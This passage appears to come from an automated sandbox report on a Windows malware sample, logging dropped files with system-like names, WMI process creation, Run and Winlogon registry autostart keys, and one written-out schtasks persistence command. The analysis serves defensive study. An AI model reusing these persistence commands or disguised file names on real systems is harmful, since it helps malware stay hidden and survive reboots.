                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005776DA push 0057774Bh; ret 1_2_00577743
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_00580684 push ecx; mov dword ptr [esp], ecx1_2_00580687
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057E6A4 push 0057E74Ch; ret 1_2_0057E744
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057E74E push 0057E79Ch; ret 1_2_0057E794
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057785E push 0057788Ch; ret 1_2_00577884
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0057F804 push 0057F830h; ret 1_2_0057F828
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_005808F4 push ecx; mov dword ptr [esp], ecx1_2_005808F6
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056D8AA push 0056D8D8h; ret 1_2_0056D8D0
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_0056D968 push 0056D994h; ret 1_2_0056D98C
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.996505494911121
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.981611898607139
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.46576892235659
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.944368858176558
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.8489874697458575
                                    Source: Internal.exeStatic PE information: section name: cheat entropy: 7.977472810285237
                                    Source: AgentMonitor.exe.1.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: StartMenuExperienceHost.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: csrss.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: WmiPrvSE.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops PE files with benign system names
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\wekqfedd.logJump to dropped file
                                    Source: C:\Users\user\Desktop\Internal.exeFile created: C:\Blockcomcrt\AgentMonitor.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\ZcxEZvOD.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Blockcomcrt\WmiPrvSE.exeJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\cQVCqZDT.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\UjoVbfCg.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\bQCMLIKB.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\WuLVbyih.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Recovery\csrss.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\Vmjnufha.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\RypOpByW.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exeJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\fXTLLrxO.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\mVSSSdRf.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\WuLVbyih.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\UjoVbfCg.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\cQVCqZDT.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\wekqfedd.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeFile created: C:\Users\user\Desktop\fXTLLrxO.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\ZcxEZvOD.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\RypOpByW.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\Vmjnufha.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\mVSSSdRf.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeFile created: C:\Users\user\Desktop\bQCMLIKB.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AgentMonitorJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhXJump to behavior
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSEJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrssJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHostJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AgentMonitorJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AgentMonitorJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhXJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
